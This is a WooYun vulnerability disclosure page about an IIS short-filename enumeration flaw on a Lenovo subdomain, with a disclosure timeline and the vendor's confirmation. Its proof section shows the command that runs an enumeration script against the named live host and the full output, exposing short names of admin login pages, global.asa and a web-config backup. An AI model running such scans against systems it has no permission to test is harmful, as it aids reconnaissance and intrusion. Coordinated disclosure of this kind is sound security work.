当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104562

漏洞标题:中国联想某站IIS短目录枚举漏洞

相关厂商:联想

漏洞作者: 路人甲

提交时间:2015-03-31 12:03

修复时间:2015-05-17 14:22

公开时间:2015-05-17 14:22

漏洞类型:应用配置错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-04-02: 厂商已经确认,细节仅向厂商公开
2015-04-12: 细节向核心白帽子及相关领域专家公开
2015-04-22: 细节向普通白帽子公开
2015-05-02: 细节向实习白帽子公开
2015-05-17: 细节向公众公开

简要描述:

中午饿了,来一发。

详细说明:

QQ截图20150329124506.png


QQ截图20150329124523.png


QQ截图20150329124617.png

漏洞证明:

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>cd c:/python27
c:\Python27>iis_shortname_Scan.py http://dlxtag.lenovo.com/
server is vulerable, please wait, scanning...
Found /b****    [scan in progress]
Found /d****    [scan in progress]
Found /i****    [scan in progress]
Found /g****    [scan in progress]
Found /c****    [scan in progress]
Found /a****    [scan in progress]
Found /f****    [scan in progress]
Found /l****    [scan in progress]
Found /t****    [scan in progress]
Found /p****    [scan in progress]
Found /m****    [scan in progress]
Found /w****    [scan in progress]
Found /0****    [scan in progress]
Found /2****    [scan in progress]
Found /ba****   [scan in progress]
Found /de****   [scan in progress]
Found /dy****   [scan in progress]
Found /im****   [scan in progress]
Found /in****   [scan in progress]
Found /gl****   [scan in progress]
Found /ch****   [scan in progress]
Found /ad****   [scan in progress]
Found /as****   [scan in progress]
Found /av****   [scan in progress]
Found /fr****   [scan in progress]
Found /lo****   [scan in progress]
Found /th****   [scan in progress]
Found /pr****   [scan in progress]
Found /me****   [scan in progress]
Found /we****   [scan in progress]
Found /06****   [scan in progress]
Found /20****   [scan in progress]
Found /bas****  [scan in progress]
Found /def****  [scan in progress]
Found /dyd****  [scan in progress]
Found /ima****  [scan in progress]
Found /ind****  [scan in progress]
Found /glo****  [scan in progress]
Found /cha****  [scan in progress]
Found /adm****  [scan in progress]
Found /asp****  [scan in progress]
Found /ass****  [scan in progress]
Found /ava****  [scan in progress]
Found /frm****  [scan in progress]
Found /log****  [scan in progress]
Found /thr****  [scan in progress]
Found /prc****  [scan in progress]
Found /mem****  [scan in progress]
Found /web****  [scan in progress]
Found /06s****  [scan in progress]
Found /201****  [scan in progress]
Found /base**** [scan in progress]
Found /defa**** [scan in progress]
Found /dyde**** [scan in progress]
Found /imag**** [scan in progress]
Found /inde**** [scan in progress]
Found /glob**** [scan in progress]
Found /chan**** [scan in progress]
Found /admi**** [scan in progress]
Found /aspn**** [scan in progress]
Found /asse**** [scan in progress]
Found /avai**** [scan in progress]
Found /frmg**** [scan in progress]
Found /logo**** [scan in progress]
Found /thre**** [scan in progress]
Found /prcc**** [scan in progress]
Found /memb**** [scan in progress]
Found /webc**** [scan in progress]
Found /06se**** [scan in progress]
Found /2013**** [scan in progress]
Found /2014**** [scan in progress]
Found /basep****        [scan in progress]
Found /defau****        [scan in progress]
Found /dydef****        [scan in progress]
Found /image****        [scan in progress]
Found /index****        [scan in progress]
Found /globa****        [scan in progress]
Found /chang****        [scan in progress]
Found /admin****        [scan in progress]
Found /aspne****        [scan in progress]
Found /assem****        [scan in progress]
Found /avail****        [scan in progress]
Found /frmge****        [scan in progress]
Found /logon****        [scan in progress]
Found /three****        [scan in progress]
Found /prccs****        [scan in progress]
Found /membe****        [scan in progress]
Found /webco****        [scan in progress]
Found /06sel****        [scan in progress]
Found /2013-****        [scan in progress]
Found /2014-****        [scan in progress]
Found /basepa****       [scan in progress]
Found /defaul****       [scan in progress]
Found /dydefa****       [scan in progress]
Found /imagea****       [scan in progress]
Found /indexc****       [scan in progress]
Found /global****       [scan in progress]
Found /change****       [scan in progress]
Found /adminb****       [scan in progress]
Found /adminl****       [scan in progress]
Found /aspnet****       [scan in progress]
Found /assemb****       [scan in progress]
Found /availa****       [scan in progress]
Found /frmget****       [scan in progress]
Found /logona****       [scan in progress]
Found /threes****       [scan in progress]
Found /prccsp****       [scan in progress]
Found /member****       [scan in progress]
Found /webcon****       [scan in progress]
Found /06sell****       [scan in progress]
Found /2013-0****       [scan in progress]
Found /2014-4****       [scan in progress]
Found /basepa*c**       [scan in progress]
Found /basepa*s**       [scan in progress]
Found /defaul*a**       [scan in progress]
Found /defaul*c**       [scan in progress]
Found /defaul*e**       [scan in progress]
Found /defaul*p**       [scan in progress]
Found /defaul*r**       [scan in progress]
Found /defaul*s**       [scan in progress]
Found /dydefa*a**       [scan in progress]
Found /dydefa*p**       [scan in progress]
Found /dydefa*s**       [scan in progress]
Found /imagea*c**       [scan in progress]
Found /imagea*e**       [scan in progress]
Found /imagea*r**       [scan in progress]
Found /imagea*s**       [scan in progress]
Found /indexc*h**       [scan in progress]
Found /indexc*m**       [scan in progress]
Found /indexc*t**       [scan in progress]
Found /global*c**       [scan in progress]
Found /global*a**       [scan in progress]
Found /global*e**       [scan in progress]
Found /global*r**       [scan in progress]
Found /global*s**       [scan in progress]
Found /change*a**       [scan in progress]
Found /change*c**       [scan in progress]
Found /change*e**       [scan in progress]
Found /change*p**       [scan in progress]
Found /change*r**       [scan in progress]
Found /change*s**       [scan in progress]
Found /adminb*c**       [scan in progress]
Found /adminb*s**       [scan in progress]
Found /adminl*a**       [scan in progress]
Found /adminl*c**       [scan in progress]
Found /adminl*e**       [scan in progress]
Found /adminl*p**       [scan in progress]
Found /adminl*s**       [scan in progress]
Found /adminl*r**       [scan in progress]
Found /aspnet   [scan in progress]
Found Dir /aspnet~1     [Done]
Found /assemb*c**       [scan in progress]
Found /assemb*s**       [scan in progress]
Found /availa*a**       [scan in progress]
Found /availa*c**       [scan in progress]
Found /availa*i**       [scan in progress]
Found /availa*n**       [scan in progress]
Found /availa*p**       [scan in progress]
Found /availa*s**       [scan in progress]
Found /frmget*a**       [scan in progress]
Found /frmget*c**       [scan in progress]
Found /frmget*e**       [scan in progress]
Found /frmget*p**       [scan in progress]
Found /frmget*s**       [scan in progress]
Found /frmget*r**       [scan in progress]
Found /logona*c**       [scan in progress]
Found /logona*e**       [scan in progress]
Found /logona*r**       [scan in progress]
Found /logona*s**       [scan in progress]
Found /threes*e**       [scan in progress]
Found /threes*a**       [scan in progress]
Found /threes*c**       [scan in progress]
Found /threes*p**       [scan in progress]
Found /threes*r**       [scan in progress]
Found /threes*s**       [scan in progress]
Found /prccsp*b**       [scan in progress]
Found /prccsp*e**       [scan in progress]
Found /prccsp*p**       [scan in progress]
Found /prccsp*s**       [scan in progress]
Found /prccsp*v**       [scan in progress]
Found /prccsp*w**       [scan in progress]
Found /member*a**       [scan in progress]
Found /member*c**       [scan in progress]
Found /member*p**       [scan in progress]
Found /member*s**       [scan in progress]
Found /webcon*a**       [scan in progress]
Found /webcon*b**       [scan in progress]
Found /webcon*k**       [scan in progress]
Found /06sell   [scan in progress]
Found Dir /06sell~1     [Done]
Found /2013-0*c**       [scan in progress]
Found /2013-0*n**       [scan in progress]
Found /2013-0*o**       [scan in progress]
Found /2014-4*c**       [scan in progress]
Found /2014-4*o**       [scan in progress]
Found /2014-4*n**       [scan in progress]
Found /basepa*cs*       [scan in progress]
Found /defaul*as*       [scan in progress]
Found /defaul*cs*       [scan in progress]
Found /defaul*es*       [scan in progress]
Found /defaul*re*       [scan in progress]
Found /defaul*sp*       [scan in progress]
Found /dydefa*as*       [scan in progress]
Found /dydefa*sp*       [scan in progress]
Found /imagea*cs*       [scan in progress]
Found /imagea*es*       [scan in progress]
Found /imagea*re*       [scan in progress]
Found /indexc*ht*       [scan in progress]
Found /indexc*tm*       [scan in progress]
Found /global*cs*       [scan in progress]
Found /global*as*       [scan in progress]
Found /global*es*       [scan in progress]
Found /global*re*       [scan in progress]
Found /global*sa*       [scan in progress]
Found /change*as*       [scan in progress]
Found /change*cs*       [scan in progress]
Found /change*es*       [scan in progress]
Found /change*re*       [scan in progress]
Found /change*sp*       [scan in progress]
Found /adminb*cs*       [scan in progress]
Found /adminl*as*       [scan in progress]
Found /adminl*cs*       [scan in progress]
Found /adminl*es*       [scan in progress]
Found /adminl*sp*       [scan in progress]
Found /adminl*re*       [scan in progress]
Found /assemb*cs*       [scan in progress]
Found /availa*as*       [scan in progress]
Found /availa*in*       [scan in progress]
Found /availa*nc*       [scan in progress]
Found /availa*sp*       [scan in progress]
Found /frmget*as*       [scan in progress]
Found /frmget*cs*       [scan in progress]
Found /frmget*es*       [scan in progress]
Found /frmget*sp*       [scan in progress]
Found /frmget*re*       [scan in progress]
Found /logona*cs*       [scan in progress]
Found /logona*es*       [scan in progress]
Found /logona*re*       [scan in progress]
Found /threes*es*       [scan in progress]
Found /threes*as*       [scan in progress]
Found /threes*cs*       [scan in progress]
Found /threes*re*       [scan in progress]
Found /threes*sp*       [scan in progress]
Found /prccsp*eb*       [scan in progress]
Found /prccsp*sp*       [scan in progress]
Found /prccsp*vs*       [scan in progress]
Found /prccsp*we*       [scan in progress]
Found /member*as*       [scan in progress]
Found /member*cs*       [scan in progress]
Found /member*sp*       [scan in progress]
Found /webcon*ak*       [scan in progress]
Found /webcon*ba*       [scan in progress]
Found /2013-0*co*       [scan in progress]
Found /2013-0*on*       [scan in progress]
Found /2014-4*co*       [scan in progress]
Found /2014-4*on*       [scan in progress]
Found /defaul*asp       [scan in progress]
Found File /defaul~1.asp        [Done]
Found /defaul*res       [scan in progress]
Found File /defaul~1.res        [Done]
Found /dydefa*asp       [scan in progress]
Found File /dydefa~1.asp        [Done]
Found /imagea*res       [scan in progress]
Found File /imagea~1.res        [Done]
Found /indexc*htm       [scan in progress]
Found File /indexc~1.htm        [Done]
Found /global*asa       [scan in progress]
Found File /global~1.asa        [Done]
Found /global*res       [scan in progress]
Found File /global~1.res        [Done]
Found /change*asp       [scan in progress]
Found File /change~1.asp        [Done]
Found /change*res       [scan in progress]
Found File /change~1.res        [Done]
Found /adminl*asp       [scan in progress]
Found File /adminl~1.asp        [Done]
Found /adminl*res       [scan in progress]
Found File /adminl~1.res        [Done]
Found /availa*asp       [scan in progress]
Found File /availa~1.asp        [Done]
Found /availa*inc       [scan in progress]
Found File /availa~1.inc        [Done]
Found /frmget*asp       [scan in progress]
Found File /frmget~1.asp        [Done]
Found /frmget*res       [scan in progress]
Found File /frmget~1.res        [Done]
Found /logona*res       [scan in progress]
Found File /logona~1.res        [Done]
Found /threes*asp       [scan in progress]
Found File /threes~1.asp        [Done]
Found /threes*res       [scan in progress]
Found File /threes~1.res        [Done]
Found /prccsp*vsp       [scan in progress]
Found File /prccsp~1.vsp        [Done]
Found /prccsp*web       [scan in progress]
Found File /prccsp~1.web        [Done]
Found /member*asp       [scan in progress]
Found File /member~1.asp        [Done]
Found /webcon*bak       [scan in progress]
Found File /webcon~1.bak        [Done]
Found /2013-0*con       [scan in progress]
Found File /2013-0~1.con        [Done]
Found /2014-4*con       [scan in progress]
Found File /2014-4~1.con        [Done]
----------------------------------------------------------------
Dir:  /aspnet~1
Dir:  /06sell~1
File: /defaul~1.asp
File: /defaul~1.res
File: /dydefa~1.asp
File: /imagea~1.res
File: /indexc~1.htm
File: /global~1.asa
File: /global~1.res
File: /change~1.asp
File: /change~1.res
File: /adminl~1.asp
File: /adminl~1.res
File: /availa~1.asp
File: /availa~1.inc
File: /frmget~1.asp
File: /frmget~1.res
File: /logona~1.res
File: /threes~1.asp
File: /threes~1.res
File: /prccsp~1.vsp
File: /prccsp~1.web
File: /member~1.asp
File: /webcon~1.bak
File: /2013-0~1.con
File: /2014-4~1.con
----------------------------------------------------------------
2 Directories, 24 Files found in toal

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-02 14:21

厂商回复:

感谢您对联想安全工作的支持

最新状态:

暂无

漏洞评价:

评论